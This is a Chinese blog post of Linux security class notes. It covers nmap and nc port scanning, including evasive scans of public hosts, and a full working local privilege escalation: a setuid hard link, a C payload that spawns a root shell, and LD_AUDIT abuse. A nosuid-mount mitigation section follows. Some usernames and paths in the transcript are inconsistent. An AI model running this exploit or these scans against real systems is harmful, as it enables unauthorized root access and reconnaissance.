【端口扫描】加防提权操作

yum install nmap -y
nmap 127.0.0.1

nmap -v www.baidu.com

nmap -p 1-65535 www.baidu.com
扫描存活
nmap -sP -v 107.160.155.0/26

 

[root@xuegod63 ~]# lsof -i :22 #查看22端口正在被哪个进程使用
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
sshd 1089 root 3u IPv4 21779 0t0 TCP *:ssh (LISTEN)
通ps命令查找对应的进程文件:
[root@xuegod63 ~]# ps -axu | grep 1089
root 1089 0.0 0.1 105996 3744 ? Ss 10:52 0:00 /usr/sbin/sshd -D
注:看到进程的文件的路径是/usr/sbin/sshd 。如果没有看到此命令的具体执行路径,说明此木马进程可以在bash终端下直接执行,通过which和rpm -qf来查看命令的来源,如下:
[root@xuegod63 ~]# which vim
/usr/bin/vim
解决:
[root@xuegod64 init.d]# kill -9 1781

nmap -sS -O www.xuegod.cn

测试自己的电脑(物理机):

 nmap -sS -O 192.168.1.63

 


例6: 查找一些有特点的IP地址中,开启80端口的服务器。
nmap -v -p 80 192.168.1.62-67

 

例7:如何更隐藏的去扫描,频繁扫描会被屏蔽或者锁定IP地址。
--randomize_hosts # 随机扫描
--scan-delay #延时扫描,单位秒
(1)、随机扫描
[root@xuegod63 ~]# nmap -v --randomize_hosts -p 80 192.168.1.62-69
Nmap scan report for 192.168.1.69 [host down]


(2)、随机扫描+延时扫描 ,默认单位秒
[root@xuegod63 ~]# nmap -v --randomize_hosts --scan-delay 3000 -p 80 192.168.1.62-69

例8:使用通配符指定IP地址
[root@xuegod63 ~]# nmap -v --randomize_hosts --scan-delay 30 -p 80 1.*.2.3-8

 

 

 

 

yum install nc -y

2、nc 语法:nc -v -w -z IP地址 端口号
-v 显示指令执行过程。
-w <超时秒数>?? 设置等待连线的时间。
-u 表示使用UDP协议
-z 使用0输入/输出模式,只在扫描通信端口时使用。
3、应用示例
例1:扫描指定的22端口

nc -v -w 10 -z 192.168.1.64 22

curl -I www.taobao.com

 

suid权限

24.2.1  开始提权
创建一个普通用户kill,并以kill用户登录 
[root@xuegod63 ~]# useradd kill
[root@xuegod63 ~]# echo 123456 | passwd --stdin kill
Changing password for user kill.
passwd: all authentication tokens updated successfully.
[root@xuegod63 ~]# su kill
[kill@xuegod63 ~]$

[kill@xuegod63 ~]$ cd /tmp/
[hello@localhost tmp]$ ls -ld /tmp/ 
drwxrwxrwt 11 root root 4096 10-14 21:29 /tmp/ 
[kill@localhost tmp]$ cd /tmp/ 
[kill@localhost tmp]$ mkdir exploit        //随便在tmp目录下创建一个目录exploit:利用
[kill@localhost adore-ng]$ ll /bin/ping
-rwsr-xr-x 1 root root 35832 Apr 24  2009 /bin/ping
[kill@localhost tmp]$ ln /bin/ping /tmp/exploit/target  //创建/bin/ping 的一个硬链接,硬链接的名随便起
[kill@localhost tmp]$ exec 3< /tmp/exploit/target   
[kill@localhost tmp]$ ls -l /proc/$$/fd/3 
lr-x------ 1 kill kill 64 10-20 09:30 /proc/10990/fd/3 -> /tmp/exploit/target 
[kill@localhost tmp]$ rm -fr /tmp/exploit/  
[kill@localhost tmp]$ ls -l /proc/$$/fd/3   //查看链接已经被删除
lr-x------ 1 hello hello 64 10-20 09:30 /proc/10990/fd/3 -> /tmp/exploit/target (deleted) 
[kill@localhost tmp]$ cat  payload.c       //写一个C语言程序
void __attribute__((constructor))  init()         //注:__这是两个_ 下划线
{ 
    setuid(0); 
    system("/bin/bash"); 
} 
[kill@localhost tmp]$ gcc -w -fPIC -shared -o /tmp/exploit  payload.c    //编译C程序
[kill@localhost tmp]$ ls -l /tmp/exploit 
-rwxrwxr-x 1 hello hello 4223 10-20 09:32 /tmp/exploit 
[kill@localhost tmp]$ LD_AUDIT="\$ORIGIN"  exec  /proc/self/fd/3   #开始提权
[root@localhost tmp]# whoami 

 

 

 


24.2.2 防止黑客利用suid漏洞提权
1、对系统中所有 777权限的目录做如下操作
[root@xuegod63 ~]# mount -o bind,nosuid /tmp /tmp
2、把用户的家目录也取消一下suid权限
[root@xuegod63 ~]# mount -o bind,nosuid /home/kill /home/kill
3、再测试创建suid相关的文件时,提示以下错误。
[root@xuegod63 ~]# su - kill
[mk@xuegod63 ~]$ ln /bin/ping /tmp/ping
ln: creating hard link `/tmp/ping' => `/bin/ping': Invalid cross-device link
#报错,创建硬链接时,报错,无效的跨设备连接
4、查找系统中权限是777的目录
find命令参数说明:
-perm mode:文件权限正好符合mode
-perm +mode:文件权限部分符合mode
-perm -mode: 文件权限完全符合mode

root@xuegod63 ~]# find / -perm -777 -type d
/dev/mqueue
/dev/shm
/var/tmp
。。。
/tmp
5、给权限是777的目录都取消一下suid权限
[root@xuegod63 ~]# mount -o bind,nosuid /dev/mqueue /dev/mqueue
[root@xuegod63 ~]# mount -o bind,nosuid /dev/shm /dev/shm
[root@xuegod63 ~]# mount -o bind,nosuid /dev/tmp /dev/tmp


[root@xuegod63 ~]# echo 1 > /proc/sys/net/ipv4/ip_default_ttl #现在改成1
[root@xuegod63 ~]# ping baidu.com #发现ping不通百度了

tcpdump -i ens33 -vn -t icmp


[root@xuegod63 ~]# vim /etc/sysctl.conf #插入
net.ipv4.ip_default_ttl = 64
[root@xuegod63 ~]# sysctl -p #使配置文件/etc/sysctl.conf中的内容立即生效

posted @ 2018-11-22 16:25  夜辰雪扬  阅读(547)  评论(0)    收藏  举报